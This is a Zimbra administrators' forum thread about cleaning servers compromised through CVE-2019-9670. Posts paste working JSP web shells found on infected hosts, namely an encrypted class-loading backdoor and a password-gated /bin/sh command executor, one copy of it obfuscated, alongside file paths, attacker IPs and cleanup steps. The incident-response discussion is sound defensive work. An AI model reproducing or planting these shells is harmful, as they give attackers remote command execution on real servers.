CVE-2019-9670 being actively exploited

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
Drake
Posts: 8
Joined: Tue May 28, 2019 8:52 am

Re: CVE-2019-9670 being actively exploited

Postby Drake » Fri May 31, 2019 7:28 am

Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.

<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>

<</opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbraAdmin/public/jsp/Alert.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("Hok8gxZFafGORRLCiowY_vpqNappusQV8agmQkI7wKk")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>

Thank you.

With Regards


elby
Posts: 14
Joined: Tue May 28, 2019 7:37 am
Contact:

Re: CVE-2019-9670 being actively exploited

Postby elby » Fri May 31, 2019 7:40 am

The problem appeared again. Do you have these folders?


/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp

with:
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java

and

/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/CryptCore_jsp.class
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/CryptCore_jsp.java
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/Docs_jsp.class
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/Docs_jsp.java

@Drake, yes, the files you mentioned are infected.
docat
Posts: 2
Joined: Wed May 29, 2019 9:01 am

Re: CVE-2019-9670 being actively exploited

Postby docat » Fri May 31, 2019 8:05 am

I notised that 2 days a row at 9:18 (my local time) sed is started. it works about 10-20 seconds and after that zmswath appears and all of this.
Can this be used somehow?
erefer@gmail.com
Posts: 3
Joined: Tue May 28, 2019 12:41 pm

Re: CVE-2019-9670 being actively exploited

Postby erefer@gmail.com » Fri May 31, 2019 8:11 am

Drake wrote:Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.

<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>
Thank you.

With Regards


Yes, it's malicious code. And your version confirm that the key used by the hacker is not fixed.

Basically, this code allows the hacker to upload an encrypted java class and to execute code in it.
elby
Posts: 14
Joined: Tue May 28, 2019 7:37 am
Contact:

Re: CVE-2019-9670 being actively exploited

Postby elby » Fri May 31, 2019 8:25 am

Help me with this plz :

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}


Do you have these files at all?

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java
Drake
Posts: 8
Joined: Tue May 28, 2019 8:52 am

Re: CVE-2019-9670 being actively exploited

Postby Drake » Fri May 31, 2019 8:48 am

erefer@gmail.com wrote:
Drake wrote:Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.

<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

>>
Thank you.

With Regards


Yes, it's malicious code. And your version confirm that the key used by the hacker is not fixed.

Basically, this code allows the hacker to upload an encrypted java class and to execute code in it.


erefer thanks for the reply. Regarding the key used by the hacker do i need to do something else than just deleting these two files?

Thank you in advance
With Regards
zimbraxtc
Posts: 7
Joined: Mon May 27, 2019 6:13 pm

Re: CVE-2019-9670 being actively exploited

Postby zimbraxtc » Fri May 31, 2019 12:24 pm

elby wrote:Help me with this plz :

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}


Do you have these files at all?

/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java


I have not.

/opt/zimbra/mailboxd/work/zimbraAdmin/ exists but is empty.

Running 8.6
mqaroush
Posts: 42
Joined: Sun Aug 03, 2014 4:31 am

Re: CVE-2019-9670 being actively exploited

Postby mqaroush » Fri May 31, 2019 9:31 pm

Can you check the following code found in the corresponding files and tell if it is malicious.
[root@we ~]# cat /opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp
<% if ( "nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA"
.equals( request.getParameter( "p" +
"pwd" ) ) )
{ java.io.InputStream AwDiE = Runtime.getRuntime()
.exec
( new
String[]
{
"/" + "bin/sh"
, "-c"
, request.getParameter(
"p" + "com"
) } )
.getInputStream()
; int MqP
= -1
;
byte[] NtRe
=
new
byte[ 22 ]
; out.print(
"<"
+
"pre>"
) ;
while(
( MqP = AwDiE.read( NtRe
) ) != -1 ) { out.print( new String( NtRe,
0, MqP ) ) ; }
out.print( "</" + "pre>" ) ;
} %>

Also , what is the meaning of this line :
[root@we~]# cat /opt/zimbra/log/access_log.2019-05-30 | grep pyth
218.103.121.116 - - [30/May/2019:00:14:20 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 5
bizonek
Posts: 7
Joined: Sat Sep 13, 2014 2:36 am

Re: CVE-2019-9670 being actively exploited

Postby bizonek » Sat Jun 01, 2019 11:59 am

hHi

Maybe this will help someone.
#0 - I did all steps suggested in this post and all from https://lorenzo.mile.si/zimbra-cve-2019-9670-being-actively-exploited-how-to-clean-the-zmcat-infection/961/ and I still had this problem, so I did:
#1 - find all corrupted files containing:
grep "if.*equals(" -R /opt/zimbra/mailboxd/

and remove code starting from %if ("HASSSSHHHHH to ; } %
example:
<%
if ( "N67nqYcLWDOojFzFNvPCSAPQKg7VysUYXclEM1BZBIQ" .equals(
.....
QokFueMBi ) ) ;
} out.print(
"</p"
+ "re>"
) ; } %>


If the file is binary, remove a whole file.

#2 - block all those IP
    141.98.80.47
    71.6.146.130
    158.69.195.70
    85.234.126.0/24
    185.211.245.0/24
    89.248.0.0/16
    46.3.96.2

#3 - Apply patch one more time (with an argument -force)

#4 - reboot the system (required to stop all connections or kill all active connections)

After this, I have almost a week without any problems.
doses
Posts: 1
Joined: Sun Jun 02, 2019 9:54 am

Re: CVE-2019-9670 being actively exploited

Postby doses » Sun Jun 02, 2019 10:43 am

Всем привет.
Hi everyone

Мне кажется стоит ещё обратить внимание на данную статью:
( https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html#href1 )

I think it is also worth paying attention to this article:
( https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html#href1 )

Return to “Administrators”

Who is online

Users browsing this forum: No registered users and 14 guests